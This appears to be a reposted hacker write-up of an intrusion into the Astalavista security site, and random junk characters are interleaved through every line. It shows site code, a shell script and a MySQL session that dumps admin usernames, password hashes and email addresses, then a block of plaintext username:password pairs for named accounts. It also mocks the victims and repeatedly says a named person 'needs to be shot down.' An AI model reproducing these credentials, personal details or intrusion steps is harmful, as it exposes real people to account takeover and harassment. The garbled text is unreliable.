            $comExploits[$x]['startdate'] = ‘0000-00-00′;- T" g/ s4 \: N$ {
            $comExploits[$x]['enddate']   = ‘0000-00-00′;/ I, F  u* A: |( X
            $comExploits[$x]['status']    = ‘1′;; \6 B) R1 [& P& C& T# A. m
            $comExploits[$x]['changelog'] = $date;7 d+ \6 R3 Q: v: I2 l9 }
8 h: t/ X8 Q! _/ c* U. H
        }2 W+ T- Y7 ^* u( J( G
[snip]
% J/ \* Q* m0 E* U( M/ ]    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>& [# f: ^* d# Z( i: J" F, ~' t. |
<rss version=”2.0″>: D6 L) W1 E* T6 _- U' }4 F
    <channel>6 Z8 Q/ M" [' _! y
        <title>ASTALAVISTA.com - Exploits</title>
2 R! [9 D4 v& E$ e( `, g( e' ~        <link>http://www.astalavista.com/exploits</link>( q6 }0 n1 |* M, J+ S. w# v
        <description>All availably Exploits.</description>& f4 w8 ]; L( A; m- N
        <language>en-us</language>3 t. p" L; i% Q* [
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>% E( ]- C  @" K6 F% }
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
: B1 x; I6 [  Z9 p! ?/ x        <generator>Astalavista.com</generator>. K$ _8 F  G8 v$ a$ U) W* }
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
" e0 F! S$ Z( w3 ^& p2 ]5 c    </channel>" d- {+ }/ \: h
</rss>’;7 |* ?" a; x, G6 v! @" U* ~( e

4 D$ c: g6 B# V; b  r" l    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {7 Z! b6 @' Q  a. j
        unlink (FULLPATH . ‘/feed/exploits.xml’);' X0 _1 `2 M0 ]- e$ \* G0 M/ `
    }
0 Q. M  K& P+ I6 c" u' t* _( ]+ h2 B' W  ^
    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
, z$ A* V, q$ w' q. X8 _[snip]' p3 E6 Z9 j. Y( f

: v1 Q  s7 v7 V1 B5 Fsh-3.2$ cat exploits.sh
( E' r( e0 j+ q' g#!/bin/sh% M5 i; x1 c# d0 s

/ J9 y. G# D) z###########################################################' w0 m9 r# r* Q1 V1 b
#                                                         #" O% I0 Q. p* ?3 |+ q+ g
#   Title:        milw0rm exploits adder                  #$ ]$ p5 P" e* ]6 V8 r6 Q
#   Description:  Add all milw0rm exploits to the         ## b: O5 M/ l/ h1 v( o$ ^# ~1 l
#                 Astalavista.com database                #
3 }/ D6 N( x' n#                                                         #. L' j; P" L' i" P, H: S3 X; Z& ^
#   Company:      Astalavista Group                       #9 n  t5 q9 Z7 h$ M. \4 l
#   Author:       Paulo M. Santos                         #
2 R& o( w: E7 y; d' E/ B: b#   E-Mail:       链接标记paulo.santos@astalavista.ch             #4 e% |% D+ g8 }1 r8 P0 e3 I
#                                                         #
% A: R' |: G# p# x1 r: O###########################################################5 o% I+ ~8 J) s0 m+ [, K% g
/ }4 Y) [' T9 P# v- n8 d
# path6 B( h6 I' U# e1 @7 y% s
this_path=/home/com/public_html/modifications/cronjobs5 r: [* U: K+ |% ?1 p# J+ J, ^
$ |! n+ D: D# q- V
# change directory
7 C) O) i# V% T, F9 O+ v+ bcd $this_path, I* q& {8 S, M- G, Q+ Q+ J# u5 l
cd tmp/
. U, M( @7 M) O/ N6 N
* L9 P; P- o" g8 G# delete files
& j; n0 Z! c' c" r+ v- Mrm -rf milw0rm.tar.* &
; K8 M6 Y# N; X8 jrm -rf milw0rm/ &
, Y" W$ W8 h, q* a8 r. H. }1 |) Q8 Y& {
# wget milw0rm paket
: I1 `+ i! G3 Mwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url], ?) i+ I- s1 M% I% V7 O7 O3 o1 W

- N: m) b' l" [9 r$ \6 p# extract milw0rm paket
3 h/ V' ]- E8 t5 q* r$ [* s( Qtar -xvf milw0rm.tar.bz2
+ M7 x& H' s  _; s; s8 E5 U" h
, }, E% R% E" U# change owner$ q* r0 \/ j% ?) t5 h) v
chown -R com .2 w; Z/ s- f% C( w  b
chgrp -R com .% Q' j/ B8 v( }& ~' k7 B

% q2 y4 a1 k* V1 S/ W# execute php script* H5 J, v& Y* S- h
cd $this_path* \' h- k, D: G
php -q exploits.php8 p) {9 g  ?3 w% H# Z; i$ }

. A* P4 q- e% u! n# l; S# delete files
9 `. `: t3 V1 N, g2 i% @7 h, a  r' Xrm -rf tmp/milw0rm.tar.*
; U% K( W% F0 Krm -rf tmp/milw0rm/+ k, L; @* L1 q  Y

- K! J& k! f/ c. q$ w5 {. s( hsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
+ O* {/ y+ W7 a  hPaulo M. Santos needs to be shot down.% B6 Z- n$ E) L- E$ j0 @  ~/ t
) a/ T6 h+ V* q5 R( C: @, R
mysql -u contrexxuser2 -p8 S0 X+ X/ {* c2 {
Enter password:
8 v4 s4 t) z, [* W4 C5 MWelcome to the MySQL monitor.  Commands end with ; or \g.
! w9 n5 j2 y# ?Your MySQL connection id is 261694
( S. Q9 l- ^4 L7 e2 jServer version: 5.0.45-community-log MySQL Community Edition (GPL)
+ G: ^8 Z7 y9 Q+ V# z& {- |* ~+ g6 O  o
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.) B1 M0 f8 `! M- J& L
( R2 b6 n3 N" i$ o4 d
mysql> show databases;
/ W5 }" [: Q$ u* E2 ^+——————–+
  x  \. n' r( q| Database           |
8 G  u' F1 C$ L$ V+——————–+
9 b% @) M+ U+ t" l7 F5 v/ ^| information_schema |
9 L6 b0 T, Z; F8 h+ p7 ~: P| com_contrexx2      |7 f, D+ q: c% A) G) O/ U! m/ l- J
| com_contrexx2_live |
: r8 s" [; |3 ^9 v$ w| test               |
+ k7 R* `- X4 F1 A8 T4 e" f+——————–+
6 b) g4 ?( |' k8 M! a, L4 rows in set (0.00 sec)  H" ^. k/ K; ^/ h# A7 s  S
3 _5 N: D' Q4 }, B6 a
mysql> use com_contrexx2_live! Z9 L* u2 g! D' x5 F
Database changed
7 ]6 b4 x7 Z- j, o% g- S+ nmysql> show tables;% O8 m+ D5 \: W6 \
+————————————————–+
6 Z& m3 ^5 a1 ]& P8 }| Tables_in_com_contrexx2_live                     |# \- B6 O; k* @# t, R
+————————————————–+; [; \! N  u" K$ r3 `
| cc_banner_counter                                |" j4 {, j9 q2 r
| cc_search_counter                                |/ A0 M2 H- y  {4 _, {2 O
| contrexx_access_group_dynamic_ids                |* J4 h1 t- |9 O% N% Z
| contrexx_access_group_static_ids                 |9 d; R# K$ e3 N" a
| contrexx_access_rel_user_group                   |
! Z9 I& r$ {- D( m" O$ z| contrexx_access_settings                         |: D* W1 p  _1 K4 {* V9 O! P9 L+ ?
| contrexx_access_user_attribute                   |8 E3 _7 F4 S6 R* x1 ?
| contrexx_access_user_attribute_name              |
* r5 ?' f! L$ L* y; r# H| contrexx_access_user_attribute_value             |
  g3 t( I* M9 A: ]2 ^. p4 c- ?| contrexx_access_user_core_attribute              |) M& F, M0 _# o1 r; g& z1 N
| contrexx_access_user_groups                      |, i' [0 g7 X  n7 f+ |! N- T6 }
| contrexx_access_user_mail                        |
/ V' O, o3 H, l4 E( o6 c| contrexx_access_user_profile                     |
. w* U4 R3 u$ b* ]8 f' v) ]| contrexx_access_user_title                       |9 h: N2 w4 R! U& x4 t2 a, L' x
| contrexx_access_user_validity                    |) A, G8 D2 ]4 o4 A6 ^
| contrexx_access_users                            |5 _  d* X! h% U9 |
| contrexx_backend_areas                           |
! w& B  `1 z( a2 i. i) P| contrexx_backups                                 |
$ N# i3 Y; i% O/ M6 P| contrexx_content                                 |6 @- c* e+ H1 @: F/ i/ d
| contrexx_content_history                         |3 O. X5 V) x# }! b* T. Y6 }
| contrexx_content_logfile                         |
' `- B# y- N4 z; C3 B/ I) u| contrexx_content_navigation                      |: d  Q7 _8 k9 S: n
| contrexx_content_navigation_history              |
3 U# g6 w- }) F| contrexx_ids                                     |
+ E: @2 t$ B; Z3 }. n' H9 A0 d| contrexx_languages                               |
5 B  a, l* T1 l6 j; r| contrexx_lib_country                             |
# O; a4 ]9 V4 ]5 ]7 F| contrexx_log                                     |4 [8 F) y5 v9 u# N
| contrexx_module_alias_source                     |
* O. u" s' _7 h2 ~| contrexx_module_alias_target                     |
) N0 J! H* _# @$ t# K| contrexx_module_block_blocks                     |
' U8 H, H3 A- q# }' @5 W| contrexx_module_block_rel_lang                   |
9 p! O" c. K7 J- b0 m. J# X| contrexx_module_block_rel_pages                  |. s1 B" c- ~, i
| contrexx_module_block_settings                   |" N5 }/ Y/ J) q8 c. d8 K  g" A
| contrexx_module_blog_categories                  |
# T! ?6 B6 p/ C4 [: P| contrexx_module_blog_comments                    |6 U, q7 y6 u4 [" r$ d$ ^
| contrexx_module_blog_message_to_category         |
/ B/ B' r) J" P, K0 ]9 m* W| contrexx_module_blog_messages                    |
1 K% v8 o0 H! l9 Z9 s1 n( E2 Y/ j| contrexx_module_blog_messages_lang               |4 _( s" W# H0 F  a
| contrexx_module_blog_networks                    |
" o# Z, T! ^+ [' b| contrexx_module_blog_networks_lang               |
, H' }, \0 G- `, Q| contrexx_module_blog_settings                    |) u* k2 R! H, m/ w( B
| contrexx_module_blog_votes                       |& W4 r5 A. b: r: y
| contrexx_module_calendar                         |
! F$ G6 B5 D* A  N4 C. a| contrexx_module_calendar_access                  |
0 _: S. `, e; Z5 D| contrexx_module_calendar_categories              |
/ {' ^( {7 u' e7 Q3 j| contrexx_module_calendar_form_data               |; B/ q" M: O3 `+ ?" n
| contrexx_module_calendar_form_fields             |- X' g. d6 i1 p" g8 A8 k) }; E
| contrexx_module_calendar_registrations           |
  n: H0 d/ V* t) y$ V| contrexx_module_calendar_settings                |, \6 l0 B: j0 d" Z. L0 X( w
| contrexx_module_calendar_style                   |  H1 C, j, n! Q
| contrexx_module_contact_form                     |
; l" V) v& Y: s8 X9 o| contrexx_module_contact_form_data                |% _; I# x8 T) Z3 N
| contrexx_module_contact_form_field               |
8 k. P9 `8 w/ s* I" }9 z| contrexx_module_contact_settings                 |
0 f3 ?5 ?2 e" S2 s* r4 J| contrexx_module_data_categories                  |# {, P% X6 \, [# n: N7 R
| contrexx_module_data_message_to_category         |; l4 @/ U# F$ Q* ^
| contrexx_module_data_messages                    |
' j# b# g* z' z4 B* R8 j| contrexx_module_data_messages_lang               |
* X6 S) ^1 D& N| contrexx_module_data_placeholders                |" n4 n) I! n; w6 a/ ^8 V; y
| contrexx_module_data_settings                    |
& `8 H8 S/ K# y- K1 O$ z( \| contrexx_module_directory_access                 |+ D  h0 g; Y( t9 v8 X  _
| contrexx_module_directory_categories             |
; Y% U1 m* O2 \/ g5 y| contrexx_module_directory_dir                    |
5 z7 e* C/ \1 q& V! m4 _| contrexx_module_directory_inputfields            |
5 V8 c7 m; K' v7 u: p/ [| contrexx_module_directory_levels                 |
  ~4 n5 _  p5 [2 [3 s| contrexx_module_directory_mail                   |
  _) V8 h  P1 d- X, t6 v. u% J| contrexx_module_directory_rel_dir_cat            |  G  ]8 B8 y1 Y$ t) m( P6 G9 m
| contrexx_module_directory_rel_dir_level          |& n( e8 A, I7 o# \) u  Q& g2 ~
| contrexx_module_directory_settings               |' ?1 r& d1 h+ N; L7 T
| contrexx_module_directory_settings_google        |9 R' Q! i+ i5 f; j4 g4 \% O; T
| contrexx_module_directory_vote                   |
) O8 U" n. m' {! m# Y| contrexx_module_docsys                           |
* c6 q  V% J0 T( o, ]| contrexx_module_docsys_categories                |6 F& Z* j; E  v& O; B/ G/ X% C3 @
| contrexx_module_egov_configuration               |3 q& ^- w5 R- i  R: D
| contrexx_module_egov_orders                      |' t3 f* j% K! J5 \! i
| contrexx_module_egov_product_calendar            |7 r0 e3 @3 u* ~# k, e1 F
| contrexx_module_egov_product_fields              |
) j1 Q' {( w" G0 O+ z' {9 n| contrexx_module_egov_products                    |- c; z: W" |& V& m; \
| contrexx_module_egov_settings                    |
4 c6 b' D; T& W' z1 P| contrexx_module_exploits                         |  C8 ?) X! v6 X$ n) O4 ?8 b
| contrexx_module_exploits_categories              |" N- o1 ^. L  o1 b
| contrexx_module_feed_category                    |
9 d& _* b& U: {4 [| contrexx_module_feed_news                        |9 T( s& R: Q' S' a' {# C$ Z
| contrexx_module_feed_newsml_association          |
" \( \5 b1 `/ @1 `| contrexx_module_feed_newsml_categories           |
# v3 p/ }+ s/ @6 `* x| contrexx_module_feed_newsml_documents            |& k* x. k: a4 o* @) L. U0 y
| contrexx_module_feed_newsml_providers            |
& I4 ]- o( M1 \9 s) N| contrexx_module_forum_access                     |
, z. d* z5 k3 {/ S/ S: b7 e( u| contrexx_module_forum_categories                 |+ s- |# n' ?4 s6 e2 K
| contrexx_module_forum_categories_lang            |( x; h0 s4 W2 o, ^7 q
| contrexx_module_forum_notification               |- s. `9 F9 y. y$ u4 i# T
| contrexx_module_forum_postings                   |* X, J2 q: \% r% \
| contrexx_module_forum_rating                     |
$ H4 `9 i! _" x' ~' D9 c3 F| contrexx_module_forum_settings                   |1 o/ ^& x+ s9 P- h! b: k
| contrexx_module_forum_statistics                 |
  ~- }2 r9 X2 I; }1 p0 h| contrexx_module_gallery_categories               |
# M. O1 r1 m4 M| contrexx_module_gallery_comments                 |7 T: k  @% _; Q2 o, X
| contrexx_module_gallery_language                 |. u' o; Y) s8 W' n4 y$ o/ `3 m5 \
| contrexx_module_gallery_language_pics            |
* E2 G4 F$ F& \, c& j% M| contrexx_module_gallery_pictures                 |; e0 y% }3 ~( [, P
| contrexx_module_gallery_settings                 |
2 [: ]; A0 E+ }6 S9 y, a# f( J| contrexx_module_gallery_votes                    |
; g: \7 {3 A: N" f( w2 x8 @. @1 o| contrexx_module_guestbook                        |
, _" b6 r$ V  A" F* S8 V| contrexx_module_guestbook_settings               |
: w2 ]) C/ [1 B: h( D0 \/ O& g; g| contrexx_module_livecam                          |1 ~- b; g6 O6 c
| contrexx_module_livecam_settings                 |
: c# r8 e5 d5 q" ?5 O| contrexx_module_market                           |
" B4 V# o) @4 S3 D2 w' L| contrexx_module_market_access                    |% M- n; o! C) W; R9 l  \) d
| contrexx_module_market_categories                |
1 @$ ~2 K( w% g7 R$ E| contrexx_module_market_mail                      |/ k6 j' {6 `% i  `
| contrexx_module_market_paypal                    |
, m: q$ M0 R* W+ L8 F0 C3 I$ H| contrexx_module_market_settings                  |7 Z6 B0 u6 L% J( J1 q& `7 C
| contrexx_module_market_spez_fields               |9 o0 t# N' w: T* S1 |( R
| contrexx_module_mediadir_access                  |' r: n% U5 s/ l1 D% ~) \5 V# R6 w
| contrexx_module_mediadir_categories              |0 _! y9 l. ]+ L; n& K
| contrexx_module_mediadir_comments                |
# F7 T! k; F% N8 |( a, H| contrexx_module_mediadir_dir                     |4 Y' X: X( @" \1 T5 ?
| contrexx_module_mediadir_inputfields             |# N2 s8 B7 Y5 ~" A) n, x
| contrexx_module_mediadir_levels                  |  E* t" f; u% y) U) J9 s( E
| contrexx_module_mediadir_mail                    |0 [, e3 c/ c( R, M* \+ E. J9 R: R# D
| contrexx_module_mediadir_rel_dir_cat             |, x7 F4 t  J" J+ ~
| contrexx_module_mediadir_rel_dir_level           |/ X" A) {, }" c5 S
| contrexx_module_mediadir_reports                 |
5 A$ L. w3 D5 e7 B! a! Q| contrexx_module_mediadir_settings                |
/ K/ i: ?; m( \  h! D5 B| contrexx_module_mediadir_settings_google         |1 m8 {3 |( G- e' j3 Y
| contrexx_module_mediadir_vote                    |
0 w' E6 z* L8 ^: V6 G| contrexx_module_memberdir_directories            |0 S* I4 ~, b1 Q& g( Y7 l
| contrexx_module_memberdir_name                   |
" D6 R) ?9 S- X6 b| contrexx_module_memberdir_settings               |6 N4 W9 H5 J* x
| contrexx_module_memberdir_values                 |$ ^6 O+ t+ J. a) z' E
| contrexx_module_nettools_allowed_groups          |
# h1 c9 c) l# T  m) }& U3 i| contrexx_module_nettools_settings                |6 }0 T+ M6 a7 ?' y3 o+ j- ?- {
| contrexx_module_news                             |
4 y7 z" o4 V6 X# y| contrexx_module_news_access                      |' o: y8 S0 O: Y( q
| contrexx_module_news_categories                  |2 o* m& p3 q# }, L
| contrexx_module_news_settings                    |
' ]. A3 X, v# u  Z: o2 |: r| contrexx_module_news_teaser_frame                |
. G7 t1 w8 T3 o9 e( a/ T2 Z  d| contrexx_module_news_teaser_frame_templates      |& K2 I0 A9 h, C+ {2 k1 D/ E
| contrexx_module_news_ticker                      |* b' W# f0 j9 m4 o/ S! l3 K
| contrexx_module_newsletter                       |  h/ a6 h+ c; q# B
| contrexx_module_newsletter_attachment            |) J" q# W: a1 |1 }- J3 O9 |
| contrexx_module_newsletter_category              |* c/ x! @( c. W. Y$ H9 n' V
| contrexx_module_newsletter_confirm_mail          |
" A$ Y, Q3 A# E. l1 O6 x| contrexx_module_newsletter_rel_cat_news          |
7 ~+ _" k7 V0 P, x- `* Y4 E| contrexx_module_newsletter_rel_user_cat          |
$ U* W8 R& Q8 R6 D& n2 p9 P6 b| contrexx_module_newsletter_settings              |
6 w6 Y" e; V( i( c3 @( w8 `; ?. Y| contrexx_module_newsletter_template              |5 L5 q* @- @. X. }  B- m9 T( ?0 u
| contrexx_module_newsletter_tmp_sending           |) n  K4 x6 x; U$ X
| contrexx_module_newsletter_user                  |
# f9 m% ?3 M1 o6 p6 k# G" v| contrexx_module_newsletter_user_title            |
( W7 O* B7 `7 L| contrexx_module_onlinetools_defaultports         |/ G  J4 c- V! ^4 [
| contrexx_module_onlinetools_defaultports_back    |
  u; K' A4 y) _: `| contrexx_module_onlinetools_geolitecity_blocks   |* A- e+ G: C! ~4 a0 N- O, J/ C, h% t
| contrexx_module_onlinetools_geolitecity_country  |
: I4 }% P% u+ D5 M| contrexx_module_onlinetools_geolitecity_location |. I  `" \& A2 W$ g) O, x4 a- k
| contrexx_module_podcast_category                 |
6 [: e" q! N; z$ T' Z/ A| contrexx_module_podcast_medium                   |
3 \" m$ ~" b  [9 {. k) l2 p! @| contrexx_module_podcast_rel_category_lang        |9 g  K% K* L. H7 ^/ n
| contrexx_module_podcast_rel_medium_category      |
. A% Z8 b4 p' z2 Z% _| contrexx_module_podcast_settings                 |) w" |8 j5 O, ]) i  ~3 ~. A
| contrexx_module_podcast_template                 |8 M& V& |( B; K# d& b& ~
| contrexx_module_proxydb                          |
) c% ^# \2 U, h# k2 X| contrexx_module_recommend                        |
0 b- a; {' {! @| contrexx_module_repository                       |. E9 Q. A. w6 x/ O% K( Y
| contrexx_module_securitynews_cats                |
. ~; @! [- L9 B| contrexx_module_securitynews_feeds               |. J- p, v& a' Z. I- E1 T
| contrexx_module_securitynews_news                |9 f! D2 W% Y: c4 d5 \: E" Z# g
| contrexx_module_shop_categories                  |
7 i& t0 l$ z& T& J- v% g' x| contrexx_module_shop_config                      |
. O( ]' g3 H$ G. F$ M: ]| contrexx_module_shop_countries                   |
. l# @3 W+ H+ _6 C& M| contrexx_module_shop_currencies                  |
: C; p7 ]2 s( u  R2 a| contrexx_module_shop_customers                   |" a3 X- U' W7 I0 k
| contrexx_module_shop_importimg                   |+ M3 y& ?3 c; C! }
| contrexx_module_shop_lsv                         |5 m' t' d" A; _) r
| contrexx_module_shop_mail                        |! O9 M% u! _) H. b: R: s4 l, O
| contrexx_module_shop_mail_content                |* c( \& {0 @' P# o. W
| contrexx_module_shop_manufacturer                |3 q: j% ]+ j- l* g/ d
| contrexx_module_shop_order_items                 |0 L7 C( ^& n! m' [( v/ g
| contrexx_module_shop_order_items_attributes      |
8 }* y7 R5 Z8 M, D7 Q+ E8 O. y| contrexx_module_shop_orders                      |
' `& Y+ {0 v; C+ s. Y0 y8 ~| contrexx_module_shop_payment                     |- G" q" L& y* f- B
| contrexx_module_shop_payment_processors          |
# c( o0 o; U) _5 y! ?8 Q# g6 B5 w- v, _| contrexx_module_shop_pricelists                  |6 E: d$ l. [7 ^, A6 [0 ?
| contrexx_module_shop_products                    |
" a; H+ M5 X# S5 N1 _+ \| contrexx_module_shop_products_attributes         |$ A# O/ J. g: W' _8 _4 a2 a5 d
| contrexx_module_shop_products_attributes_name    |( x' p" n; X7 l5 u
| contrexx_module_shop_products_attributes_value   |+ U" L6 d: \7 F
| contrexx_module_shop_products_downloads          |. X( t/ P. ^/ S. E1 d
| contrexx_module_shop_rel_countries               |
. ?( g, |% N  F  X1 J# s| contrexx_module_shop_rel_payment                 |; W8 A& e. m/ j2 @6 ~2 K" F, B
| contrexx_module_shop_rel_shipment                |
. Y, H0 _2 Y" D/ e  a5 B  k| contrexx_module_shop_shipment_cost               |
0 t, Y7 v' j7 v* n- ?4 Y| contrexx_module_shop_shipper                     |) X+ B4 K8 m* d" ~& \1 y# ?6 v' t; P. [
| contrexx_module_shop_vat                         |1 c, ]3 `7 v/ V  w% E; W8 c, Y
| contrexx_module_shop_zones                       |
. m7 V1 y+ d& I! \, Q| contrexx_module_u2u_address_list                 |! U* U% M: K1 X0 ?
| contrexx_module_u2u_message_log                  |
! F7 U2 U  s' Y. t& ~1 l) h| contrexx_module_u2u_sent_messages                |
# w) R% B  C$ q| contrexx_module_u2u_settings                     |
0 H9 z( L6 _6 Y7 a7 M1 H| contrexx_module_u2u_user_log                     |. j/ u' d: s  J, p2 y* Z
| contrexx_modules                                 |! N/ H  _1 I$ Z+ X# r4 U$ P
| contrexx_sessions                                |
& L  {( f3 A7 t| contrexx_settings                                |
; y) X" K5 T5 `9 n% c4 s0 T| contrexx_settings_smtp                           |- S: R( u; J( R9 Z" @; d
| contrexx_skins                                   |
6 L) ?) a& ~( G# V3 [; j! D| contrexx_stats_browser                           |$ P! }  e$ F6 t' K9 D+ N0 \
| contrexx_stats_colourdepth                       |
: a7 L* k$ ?: f9 \| contrexx_stats_config                            |
) G+ K3 D# f; }4 A: K| contrexx_stats_country                           |
+ J+ W5 i3 p" X! v  R" \) K| contrexx_stats_hostname                          |+ i  [  v( Q3 W4 L, ?; [
| contrexx_stats_javascript                        |
+ a# n" i1 U; q| contrexx_stats_operatingsystem                   |3 U; @$ {- t0 s- {/ |
| contrexx_stats_referer                           |( U7 j$ b: l) G6 Z4 z2 p
| contrexx_stats_requests                          |3 ]& U' G6 \! t: U, b* V6 D9 ^0 }
| contrexx_stats_requests_summary                  |
' x% ^3 p) b; z* X* S% J0 J8 D| contrexx_stats_screenresolution                  |+ o; M& o. Y; v, y0 ?
| contrexx_stats_search                            |
$ J6 @+ q$ {) h. V* ?! j8 G| contrexx_stats_spiders                           |
8 t: [3 u8 p; ], N! H| contrexx_stats_spiders_summary                   |
7 r  y" f, @( U/ g$ a( A| contrexx_stats_visitors                          |
* b. v3 b5 C' u| contrexx_stats_visitors_summary                  |
# l  G1 M" p* t; U* _; D: X( L| contrexx_voting_additionaldata                   |  I+ K1 _, x* Y' S
| contrexx_voting_email                            |2 ?/ s; p- L$ J8 l8 I) T
| contrexx_voting_rel_email_system                 |$ h1 I5 b4 A# ]- [" w
| contrexx_voting_results                          |" `& u' P' I' s; }9 K0 K
| contrexx_voting_system                           |9 U, S. H% z/ F& g: p
| foo                                              |
( a- a1 `( i* u; S$ E+————————————————–+3 q  g1 g4 `" W! p, P8 O1 {5 j
227 rows in set (0.01 sec)( ]! g* O. }' ]/ t0 d; S( r  z

. p7 k# [, Z7 pmysql> select count(*) as skids from contrexx_access_users;4 g% A6 q% Q9 d+ X  u
+——-+
' X8 H5 e7 L8 u| skids |2 d$ ?4 ?- _7 i9 G( \' B9 M4 n
+——-+
) Q0 L. H6 X$ p! j| 53699 |
3 q' k0 I- A& Y. K/ _% |+——-+
- y# i, x& _# ?  C" _1 row in set (0.00 sec)
+ B* D! W/ ]  k. {1 }, H; T9 {. _
8 R4 i- [: P' |, l( r$ M, }$ Zmysql> describe contrexx_access_users;
9 ~4 }! g& z$ A4 P# b+——————+——————————————+——+—–+————–+—————-+# G- p, Q; w& O8 Y2 X8 m& b
| Field            | Type                                     | Null | Key | Default      | Extra          |  i% [& `, m$ a+ q- r, b2 Z
+——————+——————————————+——+—–+————–+—————-+
: N) v) G9 _6 {; g+ A+ ~3 r/ g! ]| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
) ?7 K  u" R3 Q| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |# U  [& ~. e+ R$ l+ K
| username         | varchar(40)                              | YES  | MUL | NULL         |                |
  R- Y( b7 K" o8 A5 d! A8 _* _; t| password         | varchar(32)                              | YES  |     | NULL         |                |5 `! a9 Y, Q7 y
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
6 n* Y! u- }. Q| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
, Q8 Q1 [; [: ], {( k| validity         | int(10) unsigned                         | NO   |     | 0            |                |
7 h- x; G9 Q, Q9 c& q| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
+ c/ c! F- D8 X0 W' M' l| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |7 \+ [! R( n+ I* _# J
| email            | varchar(255)                             | YES  |     | NULL         |                |  |- ^) [( n) k$ J" q
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |3 |  E1 z& V7 Q
| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
' k) ^& M" I8 ]! U5 {| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
& [; Y! b' }1 f3 k/ f3 F6 L. Z; F| active           | tinyint(1)                               | NO   |     | 0            |                |
6 F; s& h& S( d- v. i( ?8 @' o| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
4 a' z* x4 C# X" O) f| restore_key      | varchar(32)                              | NO   |     |              |                |" d" f  T4 Q, u5 g, l7 Y% W
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |1 Z0 v; {5 S3 S9 c
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |% M& X; v8 U0 e3 Z" d" N
+——————+——————————————+——+—–+————–+—————-+% h6 g  @2 R! a; a
18 rows in set (0.00 sec); U) b7 W, ~0 \+ D. D& O

& ~. S: E. }- ^2 Emysql> select username,password,email from contrexx_access_users where is_admin = 1;
+ L3 k/ Y5 D, J3 }' O+————+———————————-+—————————–+
) H7 g  I7 \3 @| username   | password                         | email                       |1 O3 e2 Y- l/ y+ c2 ~' r
+————+———————————-+—————————–+) o7 A# }8 [7 [/ \; a
| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |
* t( C$ f0 P+ v# n. q. T# x; b| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
/ S" a( n1 n; M- C) I| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |8 |8 ?+ p% e$ v0 e
| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |/ J/ o& n# R! I# h* J
+————+———————————-+—————————–+) w9 {8 S; J1 ^  i; @- l. `
4 rows in set (0.04 sec)
, i! p8 k- ]3 R9 y
8 c+ [# }0 k% {( m% Y' y6 f: pmysql> exit;
# N  \3 b  {; `0 P$ H! H1 SBye
* w! ]. a9 K7 O0 U0 c# Y. [6 N- ?. _9 d$ `6 {$ j
[~] There you go, your “team of security and IT professionals” is a joke.
4 A# h* o6 a6 j+ T
" A( E/ V/ x" j; k+ h: ~0 M+——————————+
$ }1 @/ M9 w- f6 D- tsystem:f82BN3+_*
/ [: s, O3 ^4 M3 @8 L& DBe1er0ph0r:belerophor4astacom7 r# H0 F  g" `+ Z* c1 T3 {! F
prozac:asta4cms!
' f# y+ D1 Z# `& e+ ^commander:mpbdaagf6m: i1 N- Z) I* T, D/ @+ |1 y
sykadul:ak29eral) A5 L2 G# N# ?' x1 b
+——————————+. ?! H5 O0 V' G; H
- [7 I5 r6 R" d) Q3 I& \
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)) v% M8 T7 E" X8 p/ E
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.6 f9 E8 s" T4 t5 H, l5 \' @3 u

; j2 a# }, i$ W[~] Lets move to astalavista.net now,
# H( \% H9 X9 }  S: k; A2 G* V
From <链接标记[url]https://www.astalavista.net/[/url]>:$ W' l+ P" z. _4 Y. P3 G
>> Everyone knows that the best defense is a good offense.
' a4 l9 @8 A/ h. d>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
1 L( j0 k0 f/ g  |: @>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
8 A% x$ \) J0 _6 }4 x% h& y4 z>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”1 \1 n3 g  P  `" X! O
& l% N; s& \, e. _8 p0 y+ i
>> Go ahead, try and hack our server . in a completely legal way!/ m8 H0 @( _/ ~! C' M( P
>> Learn by doing: We offer our members tricky tasks and challenges on an
. G0 n7 \0 U$ s9 J" u2 K>> ongoing basis so you can test your knowledge and abilities. You can also" ?" R/ w) Y3 _, v7 d. C# t
>> demonstrate what you.ve mastered by taking part in regular hacker contests$ p$ R! K) n, |- _2 o0 i# l/ A  i
>> and war games3 Y2 q2 S- E- J- k: {; z* H

! E, L/ b, Z$ B. t[~] Lets take a look there, after all… they are hack-proof, aren’t they?!4 w. U% D/ _4 T3 B: Y8 |" o
; h# a1 a4 r& c! P" s/ p! u
[-] Tricky task: Find home dir of astalavista.net, d) I, p- }6 e' v' X

! m( S0 D% {, @! _sh-3.2$ ls -la ~astanet
  @- B: z9 K3 ttotal 48( `1 C  O# z0 ?3 _
drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .0 k* R  q' {! O/ y2 V$ a$ S, J7 K; A
